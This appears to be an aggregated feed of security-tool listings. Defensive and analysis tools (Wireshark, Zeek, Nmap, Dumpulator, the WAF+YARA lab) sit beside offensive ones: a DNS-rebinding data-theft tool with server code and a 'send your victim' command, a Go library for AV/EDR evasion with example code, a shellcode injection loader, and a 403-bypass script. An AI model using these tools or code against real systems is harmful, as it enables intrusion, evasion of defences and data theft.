
Wireshark Analyzer 4.0.6

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

tc Tor Chat Client

tc is low-tech free software for chatting anonymously and encrypted over Tor circuits using PGP. Use it to protect your communication end-to-end with RSA/DSA encryption and keep yourself anonymously reachable by anyone who only knows your .onion address and your public key. All this and more in 2400 lines of C code that compile and run on BSD and Linux systems, with an IRC-like GUI.

rebindMultiA - Tool To Perform a Multiple A Record Rebind Attack

By: Zion3R


rebindMultiA is a tool to perform a Multiple A Record rebind attack.

rebindmultia.com is a domain that I've set up to assist with these attacks. It makes every IP its own authoritative nameserver for the domain [IP].ns.rebindmultia.com. For example, 13.33.33.37.ns.rebindmultia.com's authoritative nameserver is 13.33.33.37.ip.rebindmultia.com which resolves (as you might have guessed) to 13.33.33.37.


Multiple A Record Rebind Attack

The MultiA Record Rebind attack is a variant of DNS Rebinding that weaponizes an attacker's ability to return two IP addresses in response to a DNS request, and the browser's tendency to fall back to the second IP in the DNS response when the first one doesn't respond. In this attack, the attacker will configure a malicious DNS server and two malicious HTTP servers. The DNS server will respond with two A records:

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1

The victim browser will then connect to the first IP and begin interacting with the attacker's first malicious HTTP server. This server will respond with a page that contains two iframes, one to /steal and one to /rebind. The /steal iframe will load up a malicious page that reaches into the second iframe and grabs its content. The /rebind endpoint, when hit, will issue a 302 redirect to / and kill the first malicious HTTP server. As a result, when the browser reaches back out to the attacker's HTTP server, it will be met with a closed port. As such, it will fall back to the second IP. Once the target content has been loaded in the second iframe, the first iframe can reach into it, steal the data, and exfiltrate it to the attacker's second malicious HTTP server - the callback server.
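To make the DNS side concrete, here is a minimal sketch (not the tool's actual server.py) of a dnslib-based resolver that answers every A query with the two records above — attacker IP first, 127.0.0.1 second, TTL 0:

# Sketch only -- the real logic lives in the tool's server.py.
# pip install dnslib; the attacker IP below is a placeholder.
from dnslib import RR, QTYPE, A
from dnslib.server import DNSServer, BaseResolver

ATTACKER_IP = "13.33.33.37"  # placeholder: your public IP

class RebindResolver(BaseResolver):
    def resolve(self, request, handler):
        reply = request.reply()
        qname = request.q.qname
        # External IP first, internal target second (TTL 0 to avoid caching)
        reply.add_answer(RR(qname, QTYPE.A, rdata=A(ATTACKER_IP), ttl=0))
        reply.add_answer(RR(qname, QTYPE.A, rdata=A("127.0.0.1"), ttl=0))
        return reply

if __name__ == "__main__":
    DNSServer(RebindResolver(), port=53).start()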

This attack only works in a Windows environment. Linux and Mac will default to the private IP first and the attacker's server will never be queried.

Graphic + Explanation

  1. The browser resolves the host 127.0.0.1.target.13.33.33.37.ns.rebindmultia.com.
  2. The DNS server (included in server.py) parses the requested dns name and returns two A records: 13.33.33.37 and 127.0.0.1.
  3. The victim's browser reaches out the attacker's malicious HTTP server (included in server.py) and loads the /parent page which has two iframes.
  4. The victim's browser loads /steal from the attacker's malicious HTTP server.
  5. The victim's browser loads /rebind, which results in a 302 redirect to / (the HTTP server will exit after this request; see the sketch after this list).
  6. The victim's browser redirects to / per the 302 from the attacker's server.
  7. The victim's browser attempts to load / from the attacker's (now dead) HTTP server, but fails to do so.
  8. The browser then shifts to the second IP in the DNS cache and resolves the hostname to 127.0.0.1. It then reaches out to that server and loads up the page in the iframe.
  9. The attacker's steal iframe reaches into the newly loaded second iframe and grabs the content.
  10. The attacker's steal iframe then sends the results back to the attacker's callback server.
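Steps 5-7 hinge on the first HTTP server dying right after /rebind is hit. A hedged sketch of that behavior (the real handler lives in server.py and differs in detail):

# Sketch only: 302 to / on /rebind, then hard-exit so the browser's
# retry hits a closed port and falls back to the second A record.
import os
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

class AttackerHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/rebind":
            self.send_response(302)
            self.send_header("Location", "/")
            self.end_headers()
            self.wfile.flush()  # make sure the 302 reaches the browser
            os._exit(0)         # die immediately; the port is now closed
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><!-- /parent and /steal pages served here --></html>")

ThreadingHTTPServer(("0.0.0.0", 80), AttackerHandler).serve_forever()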

Usage

pip3 install -r requirements.txt
python3 server.py --help
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
-c CALLBACK_PORT, --callback-port CALLBACK_PORT
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /

If you get this error:

โ”ฌโ”€[justin@RhynoDroplet:~/p/rebindMultiA]โ”€[14:26:24]โ”€[G:master=]
โ•ฐโ”€>$ python3 server.py

Traceback (most recent call last):
File "server.py", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'

Then you need a more up-to-date version of Python (3.7+), which added ThreadingHTTPServer.

Quick Start

This must be executed from a publicly accessible IP.

git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMultiA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py


Jsfinder - Fetches JavaScript Files Quickly And Comprehensively

By: Zion3R


jsFinder is a command-line tool written in Go that scans web pages to find JavaScript files linked in the HTML source code. It searches for any attribute that can contain a JavaScript file (e.g., src, href, data-main, etc.) and extracts the URLs of the files to a text file. The tool is designed to be simple to use, and it supports reading URLs from a file or from standard input.

jsFinder is useful for web developers and security professionals who want to find and analyze the JavaScript files used by a web application. By analyzing the JavaScript files, it's possible to understand the functionality of the application and detect any security vulnerabilities or sensitive information leakage.


Features

  • Reading URLs from a file or from stdin using command line arguments.
  • Running multiple HTTP GET requests concurrently to each URL.
  • Limiting the concurrency of HTTP GET requests using a flag.
  • Using a regular expression to search for JavaScript files in the response body of the HTTP GET requests (a rough illustration follows this list).
  • Writing the found JavaScript files to a file specified in the command line arguments or to a default file named "output.txt".
  • Printing informative messages to the console indicating the status of the program's execution and the output file's location.
  • Allowing the program to run in verbose or silent mode using a flag.

Installation

jsfinder requires Go 1.20 to install successfully. Run the following command to get the repo:

go install -v github.com/kacakb/jsfinder@latest

Usage

To see which flags you can use with the tool, use the -h flag.

jsfinder -h 
Flag Description
-l Specifies the filename to read URLs from.
-c Specifies the maximum number of concurrent requests to be made. The default value is 20.
-s Runs the program in silent mode. If this flag is not set, the program runs in verbose mode.
-o Specifies the filename to write found URLs to. The default filename is output.txt.
-read Reads URLs from stdin instead of a file specified by the -l flag.

Demo

I


If you want to read from stdin and run the program in silent mode, use this command:

cat list.txt| jsfinder -read -s -o js.txt

II

If you want to read from a file, you should specify it with the -l flag and use this command:

jsfinder -l list.txt -s -o js.txt

You can also specify the concurrency with the -c flag; the default value is 20. If you want to read from a file, specify it with the -l flag and use this command:

jsfinder -l list.txt -c 50 -s -o js.txt

TODOs

  • Adding new features
  • Improving performance
  • Adding a cookie flag
  • Reading regex from a file
  • Integrating the kacak tool (coming soon)

Screenshot

Contact

If you have any questions, feedback or collaboration suggestions related to this project, please feel free to contact me via:

e-mail

Stegano 0.11.2

Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integer sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.
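A quick example of the basic LSB hide/reveal API (per the Stegano documentation; treat this as a sketch — the set-based variant selects pixels via the generators mentioned above):

# Hide a message in the least significant bits of a PNG, then recover it.
from stegano import lsb

secret = lsb.hide("./input.png", "my secret message")  # returns a PIL image
secret.save("./output.png")
print(lsb.reveal("./output.png"))  # -> "my secret message"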

Acheron - Indirect Syscalls For AV/EDR Evasion In Go Assembly

By: Zion3R


Acheron is a library inspired by SysWhisper3/FreshyCalls/RecycledGate, with most of the functionality implemented in Go assembly.

The acheron package can be used to add indirect syscall capabilities to your Golang tradecraft, to bypass AV/EDRs that make use of usermode hooks and instrumentation callbacks to detect anomalous syscalls that don't return to ntdll.dll when the call transitions back from kernel to userland.


Main Features

  • No dependencies
  • Pure Go and Go assembly implementation
  • Custom string encryption/hashing function support to counter static analysis

How it works

The following steps are performed when creating a new syscall proxy instance:

  1. Walk the PEB to retrieve the base address of in-memory ntdll.dll
  2. Parse the exports directory to retrieve the address of each exported function
  3. Calculate the system service number for each Zw* function
  4. Enumerate unhooked/clean syscall;ret gadgets in ntdll.dll, to be used as trampolines
  5. Create the proxy instance, which can be used to make indirect (or direct) syscalls

Quickstart

Integrating acheron into your offsec tools is pretty easy. You can install the package with:

go get -u github.com/f1zm0/acheron

Then you just need to call acheron.New() to create a syscall proxy instance and use acheron.Syscall() to make an indirect syscall for Nt* APIs.

Minimal example:

package main

import (
	"fmt"
	"unsafe"

	"github.com/f1zm0/acheron"
	"golang.org/x/sys/windows" // needed for the MEM_* and PAGE_* constants below
)

func main() {
	var (
		baseAddr uintptr
		hSelf    = uintptr(0xffffffffffffffff)
	)

	// creates Acheron instance, resolves SSNs, collects clean trampolines in ntdll.dll, etc.
	ach, err := acheron.New()
	if err != nil {
		panic(err)
	}

	// indirect syscall for NtAllocateVirtualMemory
	s1 := ach.HashString("NtAllocateVirtualMemory")
	retcode, err := ach.Syscall(
		s1,                                     // function name hash
		hSelf,                                  // arg1: _In_ HANDLE ProcessHandle,
		uintptr(unsafe.Pointer(&baseAddr)),     // arg2: _Inout_ PVOID *BaseAddress,
		uintptr(unsafe.Pointer(nil)),           // arg3: _In_ ULONG_PTR ZeroBits,
		0x1000,                                 // arg4: _Inout_ PSIZE_T RegionSize,
		windows.MEM_COMMIT|windows.MEM_RESERVE, // arg5: _In_ ULONG AllocationType,
		windows.PAGE_EXECUTE_READWRITE,         // arg6: _In_ ULONG Protect
	)
	if err != nil {
		panic(err)
	}
	fmt.Printf(
		"allocated memory with NtAllocateVirtualMemory (status: 0x%x)\n",
		retcode,
	)

	// ...
}

Examples

The following examples are included in the repository:

Example Description
sc_inject Extremely simple process injection PoC, with support for both direct and indirect syscalls
process_snapshot Using indirect syscalls to take process snapshots
custom_hashfunc Example of custom encoding/hashing function that can be used with acheron

Other projects that use acheron:

Contributing

Contributions are welcome! Below are some of the things that it would be nice to have in the future:

  • 32-bit support
  • Other resolver types (e.g. HalosGate/TartarusGate)
  • More examples

If you have any suggestions or ideas, feel free to open an issue or a PR.

References

Additional Notes

The name is a reference to the Acheron river in Greek mythology, which is the river where souls of the dead are carried to the underworld.

Note
This project uses semantic versioning. Minor and patch releases should not break compatibility with previous versions. Major releases will only be used for major changes that break compatibility with previous versions.

Warning
This project has been created for educational purposes only. Don't use it on systems you don't own. The developer of this project is not responsible for any damage caused by the improper usage of the library.

License

This project is licensed under the MIT License - see the LICENSE file for details



Zeek 5.0.9

Zeek is a powerful network analysis framework that is much different from the typical IDS you may know. While focusing on network security monitoring, Zeek provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Zeek has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyber-infrastructure. Zeek's user community includes major universities, research labs, supercomputing centers, and open-science communities. This is the source code release.

Nmap Port Scanner 7.94

Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.

Hades - Go Shellcode Loader That Combines Multiple Evasion Techniques

By: Zion3R


Hades is a proof-of-concept loader that combines several evasion techniques with the aim of bypassing the defensive mechanisms commonly used by modern AV/EDRs.


Usage

The easiest way is probably to build the project on Linux using make.

git clone https://github.com/f1zm0/hades && cd hades
make

Then you can bring the executable to an x64 Windows host and run it with .\hades.exe [options].

PS > .\hades.exe -h

'||' '||' | '||''|. '||''''| .|'''.|
|| || ||| || || || . ||.. '
||''''|| | || || || ||''| ''|||.
|| || .''''|. || || || . '||
.||. .||. .|. .||. .||...|' .||.....| |'....|'

version: dev [11/01/23] :: @f1zm0

Usage:
hades -f <filepath> [-t selfthread|remotethread|queueuserapc]

Options:
-f, --file <str> shellcode file path (.bin)
-t, --technique <str> injection technique [selfthread, remotethread, queueuserapc]

Example:

Inject shellcode that spawns calc.exe with the queueuserapc technique:

.\hades.exe -f calc.bin -t queueuserapc

Showcase

User-mode hooking bypass with syscall RVA sorting (NtQueueApcThread hooked with frida-trace and custom handler)

Instrumentation callback bypass with indirect syscalls (injected DLL is from syscall-detect by jackullrich)

Additional Notes

Direct syscall version

In the latest release, direct syscall capabilities have been replaced by indirect syscalls provided by acheron. If for some reason you want to use the previous version of the loader that used direct syscalls, you need to explicitly pass the direct_syscalls tag to the compiler, which will figure out which files need to be included in and excluded from the build.

GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -tags='direct_syscalls' -o dist/hades_directsys.exe cmd/hades/main.go

Disclaimers

Warning
This project has been created for educational purposes only, to experiment with malware dev in Go, and learn more about the unsafe package and the weird Go Assembly syntax. Don't use it on systems you don't own. The developer of this project is not responsible for any damage caused by the improper use of this tool.

Credits

Shoutout to the following people that shared their knowledge and code that inspired this tool:

License

This project is licensed under the GPLv3 License - see the LICENSE file for details



Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403

By: Zion3R


  • A simple script just made for self use for bypassing 403
  • It can also be used to compare responses under various conditions, as shown in the snap below

Usage

./bypass-403.sh https://example.com admin

./bypass-403.sh website-here path-here

Features

  • Use 24 known bypasses for 403 with the help of curl (a rough Python illustration of a few such checks follows below)
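The script itself drives curl; as a hedged Python illustration (the exact 24 checks may differ), the idea is to replay the same request with path and header mutations and compare status codes and body lengths:

# Illustration only: a few of the classic 403-bypass probes.
import requests

def probe(base, path):
    attempts = [
        (f"{base}/{path}", {}),
        (f"{base}/%2e/{path}", {}),                        # encoded dot segment
        (f"{base}/{path}/.", {}),                          # trailing /.
        (f"{base}//{path}//", {}),                         # doubled slashes
        (f"{base}/{path}", {"X-Original-URL": f"/{path}"}),
        (f"{base}/{path}", {"X-Forwarded-For": "127.0.0.1"}),
    ]
    for url, headers in attempts:
        r = requests.get(url, headers=headers, timeout=10)
        print(r.status_code, len(r.content), url, headers or "")

probe("https://example.com", "admin")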

Installation

  • git clone https://github.com/iamj0ker/bypass-403
  • cd bypass-403
  • chmod +x bypass-403.sh
  • sudo apt install figlet - If you are unable to see the logo as in the screenshot
  • sudo apt install jq - If you don't have jq installed on your machine

Contributors

remonsec, manpreet, MayankPandey01, saadibabar



Dumpulator - An Easy-To-Use Library For Emulating Memory Dumps. Useful For Malware Analysis (Config Extraction, Unpacking) And Dynamic Analysis In General (Sandboxing)

By: Zion3R


Note: This is a work-in-progress prototype, please treat it as such. Pull requests are welcome! You can get your feet wet with good first issues

An easy-to-use library for emulating code in minidump files. Here are some links to posts/videos using dumpulator:


Examples

Calling a function

The example below opens StringEncryptionFun_x64.dmp (download a copy here), allocates some memory and calls the decryption function at 0x140001000 to decrypt the string at 0x140017000:

from dumpulator import Dumpulator

dp = Dumpulator("StringEncryptionFun_x64.dmp")
temp_addr = dp.allocate(256)
dp.call(0x140001000, [temp_addr, 0x140017000])
decrypted = dp.read_str(temp_addr)
print(f"decrypted: '{decrypted}'")

The StringEncryptionFun_x64.dmp is collected at the entry point of the tests/StringEncryptionFun example. You can get the compiled binaries for StringEncryptionFun here

Tracing execution

from dumpulator import Dumpulator

dp = Dumpulator("StringEncryptionFun_x64.dmp", trace=True)
dp.start(dp.regs.rip)

This will create StringEncryptionFun_x64.dmp.trace with a list of instructions executed and some helpful indications when switching modules etc. Note that tracing significantly slows down emulation and it's mostly meant for debugging.

Reading utf-16 strings

from dumpulator import Dumpulator

dp = Dumpulator("my.dmp")
buf = dp.call(0x140001000)
dp.read_str(buf, encoding='utf-16')

Running a snippet of code

Say you have the following function:

00007FFFC81C06C0 | mov qword ptr [rsp+0x10],rbx       ; prolog_start
00007FFFC81C06C5 | mov qword ptr [rsp+0x18],rsi
00007FFFC81C06CA | push rbp
00007FFFC81C06CB | push rdi
00007FFFC81C06CC | push r14
00007FFFC81C06CE | lea rbp,qword ptr [rsp-0x100]
00007FFFC81C06D6 | sub rsp,0x200 ; prolog_end
00007FFFC81C06DD | mov rax,qword ptr [0x7FFFC8272510]

You only want to execute the prolog and set up some registers:

from dumpulator import Dumpulator

prolog_start = 0x00007FFFC81C06C0
# we want to stop the instruction after the prolog
prolog_end = 0x00007FFFC81C06D6 + 7

dp = Dumpulator("my.dmp", quiet=True)
dp.regs.rcx = 0x1337
dp.start(start=prolog_start, end=prolog_end)
print(f"rsp: {hex(dp.regs.rsp)}")

The quiet flag suppresses the logs about DLLs loaded and memory regions set up (for use in scripts where you want to reduce log spam).

Custom syscall implementation

You can (re)implement syscalls by using the @syscall decorator:

from dumpulator import *
from dumpulator.native import *
from dumpulator.handles import *
from dumpulator.memory import *

@syscall
def ZwQueryVolumeInformationFile(dp: Dumpulator,
                                 FileHandle: HANDLE,
                                 IoStatusBlock: P[IO_STATUS_BLOCK],
                                 FsInformation: PVOID,
                                 Length: ULONG,
                                 FsInformationClass: FSINFOCLASS
                                 ):
    return STATUS_NOT_IMPLEMENTED

All the syscall function prototypes can be found in ntsyscalls.py. There are also a lot of examples there on how to use the API.

To hook an existing syscall implementation you can do the following:

import dumpulator.ntsyscalls as ntsyscalls

@syscall
def ZwOpenProcess(dp: Dumpulator,
                  ProcessHandle: Annotated[P[HANDLE], SAL("_Out_")],
                  DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
                  ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")],
                  ClientId: Annotated[P[CLIENT_ID], SAL("_In_opt_")]
                  ):
    process_id = ClientId.read_ptr()
    assert process_id == dp.parent_process_id
    ProcessHandle.write_ptr(0x1337)
    return STATUS_SUCCESS

@syscall
def ZwQueryInformationProcess(dp: Dumpulator,
                              ProcessHandle: Annotated[HANDLE, SAL("_In_")],
                              ProcessInformationClass: Annotated[PROCESSINFOCLASS, SAL("_In_")],
                              ProcessInformation: Annotated[PVOID, SAL("_Out_writes_bytes_(ProcessInformationLength)")],
                              ProcessInformationLength: Annotated[ULONG, SAL("_In_")],
                              ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
                              ):
    if ProcessInformationClass == PROCESSINFOCLASS.ProcessImageFileNameWin32:
        if ProcessHandle == dp.NtCurrentProcess():
            main_module = dp.modules[dp.modules.main]
            image_path = main_module.path
        elif ProcessHandle == 0x1337:
            image_path = R"C:\Windows\explorer.exe"
        else:
            raise NotImplementedError()
        buffer = UNICODE_STRING.create_buffer(image_path, ProcessInformation)
        assert ProcessInformationLength >= len(buffer)
        if ReturnLength.ptr:
            dp.write_ulong(ReturnLength.ptr, len(buffer))
        ProcessInformation.write(buffer)
        return STATUS_SUCCESS
    return ntsyscalls.ZwQueryInformationProcess(dp,
        ProcessHandle,
        ProcessInformationClass,
        ProcessInformation,
        ProcessInformationLength,
        ReturnLength
    )

Custom structures

Since v0.2.0 there is support for easily declaring your own structures:

from dumpulator.native import *

class PROCESS_BASIC_INFORMATION(Struct):
    ExitStatus: ULONG
    PebBaseAddress: PVOID
    AffinityMask: KAFFINITY
    BasePriority: KPRIORITY
    UniqueProcessId: ULONG_PTR
    InheritedFromUniqueProcessId: ULONG_PTR

To instantiate these structures you have to use a Dumpulator instance:

pbi = PROCESS_BASIC_INFORMATION(dp)
assert ProcessInformationLength == Struct.sizeof(pbi)
pbi.ExitStatus = 259  # STILL_ACTIVE
pbi.PebBaseAddress = dp.peb
pbi.AffinityMask = 0xFFFF
pbi.BasePriority = 8
pbi.UniqueProcessId = dp.process_id
pbi.InheritedFromUniqueProcessId = dp.parent_process_id
ProcessInformation.write(bytes(pbi))
if ReturnLength.ptr:
    dp.write_ulong(ReturnLength.ptr, Struct.sizeof(pbi))
return STATUS_SUCCESS

If you pass a pointer value as a second argument, the structure will be read from memory. You can declare pointers with myptr: P[MY_STRUCT] and dereference them with myptr[0].
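For instance, continuing the example above (the address here is hypothetical, just to show the shape of the call):

# Read an existing PROCESS_BASIC_INFORMATION from dump memory
# at a hypothetical address, then access its fields.
pbi = PROCESS_BASIC_INFORMATION(dp, 0x1337000)
print(pbi.UniqueProcessId)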

Collecting the dump

There is a simple x64dbg plugin available called MiniDumpPlugin. The minidump command has been integrated into x64dbg since 2022-10-10. To create a dump, pause execution and execute the command MiniDump my.dmp.

Installation

From PyPI (latest release):

python -m pip install dumpulator

To install from source:

python setup.py install

Install for a development environment:

python setup.py develop

Related work

  • Dumpulator-IDA: This project is a small POC plugin for launching dumpulator emulation within IDA, passing it addresses from your IDA view using the context menu.
  • wtf: Distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows
  • speakeasy: Windows sandbox on top of unicorn.
  • qiling: Binary emulation framework on top of unicorn.
  • Simpleator: User-mode application emulator based on the Hyper-V Platform API.

What sets dumpulator apart from sandboxes like speakeasy and qiling is that the full process memory is available. This improves performance because you can emulate large parts of malware without ever leaving unicorn. Additionally, only syscalls have to be emulated to provide a realistic Windows environment (since everything actually is a legitimate process environment).

Credits



KoodousFinder - A Simple Tool That Allows Users To Search For And Analyze Android Apps For Potential Security Threats And Vulnerabilities

By: Zion3R


A simple tool that allows users to search for and analyze Android apps for potential security threats and vulnerabilities.


Account and API Key

Create a Koodous account and get your API key at https://koodous.com/settings/developers

Install

$ pip install koodousfinder

Arguments

Param Description
-h, --help Show this help message and exit
--package-name General search for APKs
--app-name Name of the app to search for

Examples

koodous.py --package-name "app: Brata AND package: com.brata"
koodous.py --package-name "package: com.google.android.videos AND trusted: true"
koodous.py --package-name "com.metasploit"
python3 koodous.py --app-name "WhatsApp MOD"



Modifiers for advanced search

Attribute Modifier Description
Hash hash: Performs the search depending on the automatically inserted hash. The admitted hashes are sha1, sha256 and md5.
App name app: Searches for the specified app name. If it is a compound name, it can be searched enclosed in quotes, for example: app: "Whatsapp premium".
Package name package: Searches the package name to see if it contains the indicated string, for example: package: com.whatsapp.
Name of the developer or company developer: Searches whether the company or developer field includes the indicated string, for example: developer: "WhatsApp Inc.".
Certificate certificate: Searches the apps by their certificate. For example: cert: 60BBF1896747E313B240EE2A54679BB0CE4A5023 or certificate: 38A0F7D505FE18FEC64FBF343ECAAAF310DBD799.

More information: https://docs.koodous.com/apks.html.
TODO

  • Discord Integration
  • Rulesets view


Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

By: Zion3R

WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64, made and cooked from two main ingredients, WAF + YARA, to detect malicious files (e.g. webshells, viruses, malware, binaries) typically uploaded through web functions (file upload).


Purpose

In essence, the main idea came to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before WAF can forward them to the backend e.g. files uploaded through web functions see: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

Do malware detection through WAF?

Yes, one solution is to use ModSecurity + ClamAV. Most guides call ClamAV as a process and not as a daemon; in this case, analysing a file could take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

Do malware detection through WAF + YARA?

:-( A few clues were shown at Black Hat Asia 2019; please continue reading and see our quick LAB deployment below.

WAFARAY: how does it work?

Basically, it is a quick deployment: (1) pre-compiled and ready-to-use YARA rules are wired into ModSecurity (WAF) via a custom rule; (2) this custom rule performs an inspection and detection of files that might contain malicious code; (3) typically for web upload functions, if the file is suspicious it will be rejected with a 403 Forbidden code by ModSecurity.

โœ”๏ธThe YaraCompile.py compiles all the yara rules. (Python3 code)
โœ”๏ธThe test.conf is a virtual host that contains the mod security rules. (ModSecurity Code)
โœ”๏ธModSecurity rules calls the modsec_yara.py in order to inspect the file that is trying to upload. (Python3 code)
โœ”๏ธYara returns two options 1 (200 OK) or 0 (403 Forbidden)

Main Paths:

  • Yara Compiled rules: /YaraRules/Compiled
  • Yara Default rules: /YaraRules/rules
  • Yara Scripts: /YaraRules/YaraScripts
  • Apache vhosts: /etc/apache2/sites-enabled
  • Temporal Files: /temporal

Approach

  • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
  • Redteamers/pentesters: GreyBox scope , upload and bypass with a malicious file, rule enforcement.
  • Security Officers: Keep alerting, threat hunting.
  • SOC: Best monitoring about malicious files.
  • CERT: Malware Analysis, Determine new IOC.

Building Detection Lab

The Proof of Concept is based on a Debian 11.3.0 (stable) x64 OS, OWASP CRS v3.3.2 and Yara 4.0.5. You will find the automatic installation script here: wafaray_install.sh; an optional manual installation guide can be found here: manual_instructions.txt. A PHP page has also been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

Installation (recommended) with shell scripts

โœ”๏ธStep 2: Deploy using VMware or VirtualBox
โœ”๏ธStep 3: Once installed, please follow the instructions below:
alex@waf-labs:~$ su root 
root@waf-labs:/home/alex#

# Remember to change YOUR_USER by your username (e.g waf)
root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
root@waf-labs:/home/alex# exit
alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
alex@waf-labs:~$ sudo apt-get update
alex@waf-labs:~$ sudo apt-get install sudo -y
alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
alex@waf-labs:~$ git clone https://github.com/alt3kx/wafaray
alex@waf-labs:~$ cd wafaray
alex@waf-labs:~$ dos2unix wafaray_install.sh
alex@waf-labs:~$ chmod +x wafaray_install.sh
alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

# Test your LAB environment
alex@waf-labs:~$ firefox localhost:8080/upload.php

Yara Rules

Once the Yara rules are downloaded and compiled, it is similar to deploying ModSecurity: you need to customize which rules you want to apply. The following log is an example of the Web Application Firewall + Yara detecting a malicious file; in this case, eicar was detected.

Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
[file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
[msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

Testing WAFARAY... voilà...

Stop / Start ModSecurity

$ sudo service apache2 stop
$ sudo service apache2 start

Apache Logs

$ cd /var/log
$ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

Demos

Be careful with your tests. The following demos were tested on isolated virtual machines.

Demo 1 - EICAR

A malicious file is uploaded, and the ModSecurity rules plus Yara deny uploading the file to the backend if it matches at least one Yara rule. (Example malware: https://secure.eicar.org/eicar.com.txt) DO NOT EXECUTE THE FILE.

Demo 2 - WebShell.php

For this demo, we disable rule 933110 - PHP Inject Attack to validate the Yara rules. A malicious file is uploaded, and the ModSecurity rules plus Yara deny uploading the file to the backend if it matches at least one Yara rule. (Example PHP webshell: https://github.com/drag0s/php-webshell) DO NOT EXECUTE THE FILE.

Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

A malicious file is uploaded, and the ModSecurity rules plus Yara deny uploading the file to the backend if it matches at least one Yara rule. (Example from Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) DO NOT EXECUTE THE FILE.

YARA Rules sources

In case you want to download more yara rules, see the following repositories:

References

Roadmap until next release

  • Malware Hash Database (MLDBM). The database stores the MD5 or SHA1 hashes of files detected as suspicious.
  • To be tested: CRS ModSecurity v3.3.3 new rules
  • ModSecurity rules improvement for malware detection with the database.
  • Blacklist and whitelist to be created for MD5 or SHA1 hashes.
  • To be tested: run in the background if the Yara analysis takes more than 3 seconds.
  • To be tested: new payloads, example: PowerShell Obfuscated (webshells)
